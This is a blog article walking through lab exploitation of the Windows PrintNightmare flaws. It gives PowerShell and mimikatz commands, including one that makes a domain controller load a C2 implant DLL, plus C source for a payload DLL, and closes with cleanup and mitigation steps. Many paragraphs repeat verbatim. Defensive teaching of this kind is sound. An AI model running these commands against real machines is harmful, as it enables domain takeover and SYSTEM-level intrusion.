Exploitation of The Print Nightmare Vulnerability
18/07/2021
Eyad Almuqhim & Osama Alghamdi
Eyad Almuqhim & Osama Alghamdi
Introduction
This article will summarize what the Print Nightmare vulnerability is and what it can lead to if exploited by adversaries. It will provide a Proof of Concept of exploiting the vulnerability in a Windows environment to showcase its impact and how to protect against it.
The Print Spooler Service
The Print Spooler (spoolsv.exe) is a Windows service that handles print jobs. The description of the service is: "This service spools print jobs and handles interaction with the printer. If you turn off this service, you won't be able to print or see your printers.":
This article will summarize what the Print Nightmare vulnerability is and what it can lead to if exploited by adversaries. It will provide a Proof of Concept of exploiting the vulnerability in a Windows environment to showcase its impact and how to protect against it.
The Print Spooler Service
The Print Spooler (spoolsv.exe) is a Windows service that handles print jobs. The description of the service is: "This service spools print jobs and handles interaction with the printer. If you turn off this service, you won't be able to print or see your printers.":
The service runs by default on both Windows servers and clients:
The Print Nightmare Vulnerability
It references two similar vulnerabilities (CVE-2021-1675 & CVE-2021-34527) affecting the Print Spooler service in Windows. It allows for Local Privilege Escalation (LPE) from a normal user account to NT AUTHORITY\SYSTEM privileges. The vulnerability can also be remotely exploited—Remote Code Execution (RCE)—to acquire NT AUTHORITY\SYSTEM privileges on a remote system by using a normal domain user. This means a normal domain user can exploit a vulnerable Print Spooler service on a domain controller remotely to compromise the entire domain.
What is the SYSTEM account?
The NT AUTHORITY\SYSTEM is also known as the computer account—the one the Operating System uses. It has the highest privileges on a Windows endpoint, and it is more powerful than the local Administrator account. The SYSTEM account, for example, can read the SAM hive in the Registry which contains the local users' password hashes. The local Administrator cannot—however, there are ways to elevate to SYSTEM if you have an Administrator account.
When communicating with other endpoints using the SYSTEM account, you communicate as the computer itself. So if the computer object itself is granted permissions on other objects in the environment, you can access those permissions when you run as SYSTEM—a potential for lateral movement. Other endpoints will see the host name followed by a dollar sign (COMPUTER$) when you connect to them as the computer account, i.e., SYSTEM:
It references two similar vulnerabilities (CVE-2021-1675 & CVE-2021-34527) affecting the Print Spooler service in Windows. It allows for Local Privilege Escalation (LPE) from a normal user account to NT AUTHORITY\SYSTEM privileges. The vulnerability can also be remotely exploited—Remote Code Execution (RCE)—to acquire NT AUTHORITY\SYSTEM privileges on a remote system by using a normal domain user. This means a normal domain user can exploit a vulnerable Print Spooler service on a domain controller remotely to compromise the entire domain.
What is the SYSTEM account?
The NT AUTHORITY\SYSTEM is also known as the computer account—the one the Operating System uses. It has the highest privileges on a Windows endpoint, and it is more powerful than the local Administrator account. The SYSTEM account, for example, can read the SAM hive in the Registry which contains the local users' password hashes. The local Administrator cannot—however, there are ways to elevate to SYSTEM if you have an Administrator account.
When communicating with other endpoints using the SYSTEM account, you communicate as the computer itself. So if the computer object itself is granted permissions on other objects in the environment, you can access those permissions when you run as SYSTEM—a potential for lateral movement. Other endpoints will see the host name followed by a dollar sign (COMPUTER$) when you connect to them as the computer account, i.e., SYSTEM:
Exploitation
We will demonstrate exploiting the vulnerability for both Local Privilege Escalation (LPE) as well as exploiting a remote system (RCE).
Local Privilege Escalation (LPE)
One of the available exploits for Local Privilege Escalation (LPE) is written in PowerShell. There are two options for using this exploit, the first is to provide a username and a password and the exploit will create a DLL file that creates a local user and adding it to the local Administrators group using the provided credentials.
Note: The username "adm1n" and password "P@ssw0rd" will be used if they are not provided, which should be avoided:
We will demonstrate exploiting the vulnerability for both Local Privilege Escalation (LPE) as well as exploiting a remote system (RCE).
Local Privilege Escalation (LPE)
One of the available exploits for Local Privilege Escalation (LPE) is written in PowerShell. There are two options for using this exploit, the first is to provide a username and a password and the exploit will create a DLL file that creates a local user and adding it to the local Administrators group using the provided credentials.
Note: The username "adm1n" and password "P@ssw0rd" will be used if they are not provided, which should be avoided:
To add a new local Administrator user, you can use the following command:
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare –NewUser <username> -NewPassword <password>
The second option is to directly provide your DLL to execute as a payload for the exploit instead of creating a local Administrator user. In our PoC here, we made a simple DLL that saves the value of whoami command into a file in the Public user folder:
#include "pch.h"
#include "iostream"
int RunCMD()
{
system("whoami > C:\\Users\\Public\\whoami.txt");
return 0;
}
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
RunCMD();
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
Running the exploit again but providing our DLL instead of creating a local Admin (you need to provide the full path of the DLL, not the relative path):
Once executed, we see the confirmation that we are SYSTEM:
Remote Code Execution (RCE)
The RCE exploit is available in mimikatz. In this scenario, we have three machines involved:
WIN10: Source of exploitation, the machine that will run mimikatz to exploit the target. It is also the same machine hosting the DLL payload in an SMB share. The DLL is a C2 implant.
DC: The target that we will exploit its Print Spooler service. The DC will pull the DLL hosted on WIN10 share.
C2 Server: A server that will receive the call back from the Spooler Service on the DC.
The exploitation requires a domain user. We will be using a normal domain user "vagrant":
The RCE exploit is available in mimikatz. In this scenario, we have three machines involved:
WIN10: Source of exploitation, the machine that will run mimikatz to exploit the target. It is also the same machine hosting the DLL payload in an SMB share. The DLL is a C2 implant.
DC: The target that we will exploit its Print Spooler service. The DC will pull the DLL hosted on WIN10 share.
C2 Server: A server that will receive the call back from the Spooler Service on the DC.
The exploitation requires a domain user. We will be using a normal domain user "vagrant":
We generated a DLL that establishes a connection to our C2 server and put it in a share that is accessible by the target:
We use mimikatz for RCE on WIN10 machine with the domain controller (DC) as the target:
misc::printnightmare /server:dc.windomain.local /authdomain:windomain /authuser:vagrant /authpassword:vagrant /library:\\win10\share\c2.dll
After execution, we receive a call back on the C2 server from the DC with SYSTEM privileges:
And we are running under the Print Spooler service (spoolsv.exe):
Clean Up
It's important to remove any residuals of exploitation, especially if you create a local Administrator account.
If your payload was creating a local Administrator user, you can delete the user from an elevated command prompt:
It's important to remove any residuals of exploitation, especially if you create a local Administrator account.
If your payload was creating a local Administrator user, you can delete the user from an elevated command prompt:
net user <user_created> /delete
Also, remove the DLLs created by the exploit at the target system. The DLLs will be located at path:
C:\Windows\System32\spool\drivers\x64\3
Mitigation
The ultimate solution for the Print Nightmare vulnerability is to disable the print spooler service if the service is not required. Disabling the service will mitigate the vulnerability.
Stopping the service and setting StartType to Disabled (so it doesn't auto start on reboot):
The ultimate solution for the Print Nightmare vulnerability is to disable the print spooler service if the service is not required. Disabling the service will mitigate the vulnerability.
Stopping the service and setting StartType to Disabled (so it doesn't auto start on reboot):
Stop-Service Spooler –Verbose
Set-Service Spooler –StartType Disabled -Verbose
If the service cannot be disabled and there is a need for it, ensure you install the latest Windows patches and follow Microsoft workarounds:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527
Conclusion
This article covered The Print Nightmare vulnerability and its exploitability as of the date of writing. It's important to keep up with Microsoft's security update guide for any development of the vulnerability or other related issues.
This article covered The Print Nightmare vulnerability and its exploitability as of the date of writing. It's important to keep up with Microsoft's security update guide for any development of the vulnerability or other related issues.
Share this blog
Follow us
Advance your skills by reading the latest blog created by our team.
Other Blogs
Other Blogs